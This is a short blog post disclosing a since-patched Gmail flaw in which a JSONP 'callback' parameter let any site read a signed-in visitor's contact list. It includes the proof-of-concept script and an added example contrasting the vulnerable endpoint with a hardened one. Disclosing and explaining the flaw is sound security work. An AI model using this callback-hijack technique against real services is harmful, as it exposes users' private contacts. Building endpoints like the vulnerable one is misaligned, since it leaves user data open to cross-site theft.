Serious Gmail vulnerability fixed

Written by Garett Rogers

After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable to the URL, the creators of a malicious site could gain access to a visitor's entire Gmail contact list without warning.

<script language="javascript">
  // Callback named in the request URL below: the server wraps the contact
  // list in a call to this function, so the page receives it as a plain object.
  function getContacts(response){
    var output = "";
    for(var x=0;x<response.Body.Contacts.length;x++){
      output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
    }
    alert(output);
  }
</script>

<script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500&psort=Affinity&callback=getContacts">
</script>

This sample script once proudly displayed the visitor's contact list if they were logged into their Google account. Only hours after it was reported to the Google security team, the vulnerability was fixed.
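To make the underlying problem and its fix concrete, here is an added example (not code from the article or from Google) that models the callback wrapping described above beside a hardened response builder; the endpoint shape, the sample contacts and the same-origin header check are assumptions, not Google's actual implementation.

```javascript
// Constructed sample data standing in for a signed-in user's contact list.
const SAMPLE_CONTACTS = [
  { Name: "Alice Example", Email: "alice@example.com" },
  { Name: "Bob Example", Email: "bob@example.com" },
];

// Vulnerable form: the caller picks the callback name, so any site can load
// this URL in a <script> tag; the browser attaches the victim's cookies and
// the attacker's function receives the data.
function vulnerableContacts(req) {
  const body = JSON.stringify({ Body: { Contacts: SAMPLE_CONTACTS } });
  const cb = req.query.callback;
  return cb
    ? { status: 200, contentType: "text/javascript", body: `${cb}(${body});` }
    : { status: 200, contentType: "application/json", body };
}

// Hardened form: (1) refuse callback wrapping for session-bound data;
// (2) require a custom header, which a cross-site <script> tag cannot set
// (assumed convention; SameSite cookies add a further layer today);
// (3) prefix the JSON so that a <script> include throws before evaluating.
const ANTI_HIJACK_PREFIX = ")]}'\n";
function hardenedContacts(req) {
  if (req.query.callback !== undefined) {
    return { status: 400, contentType: "text/plain", body: "callback not supported" };
  }
  if (req.headers["x-requested-with"] !== "XMLHttpRequest") {
    return { status: 403, contentType: "text/plain", body: "missing same-origin header" };
  }
  const body = JSON.stringify({ Body: { Contacts: SAMPLE_CONTACTS } });
  return { status: 200, contentType: "application/json", body: ANTI_HIJACK_PREFIX + body };
}

// Same-origin client: strip the prefix before parsing the JSON.
function parseHardened(body) {
  if (!body.startsWith(ANTI_HIJACK_PREFIX)) throw new Error("unexpected response prefix");
  return JSON.parse(body.slice(ANTI_HIJACK_PREFIX.length));
}

// Model of what a <script src="...&callback=NAME"> tag does: evaluate the
// response body as JavaScript with a function of that name in scope.
function simulateScriptInclusion(resp, callbackName, callbackFn) {
  try {
    new Function(callbackName, resp.body)(callbackFn);
    return "ran";
  } catch (e) {
    return "threw";
  }
}
```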

"Thanks for reporting this to us. We have identified and fixed the problem" -- Google Security

It's a little concerning that this problem even existed, but knowing the fix was made only hours after it was reported does warrant some level of reassurance.

Update:
The problem is only partially fixed.  The vulnerability exposed through video.google.com has been patched up, but there are other subdomains where the problem still exists.
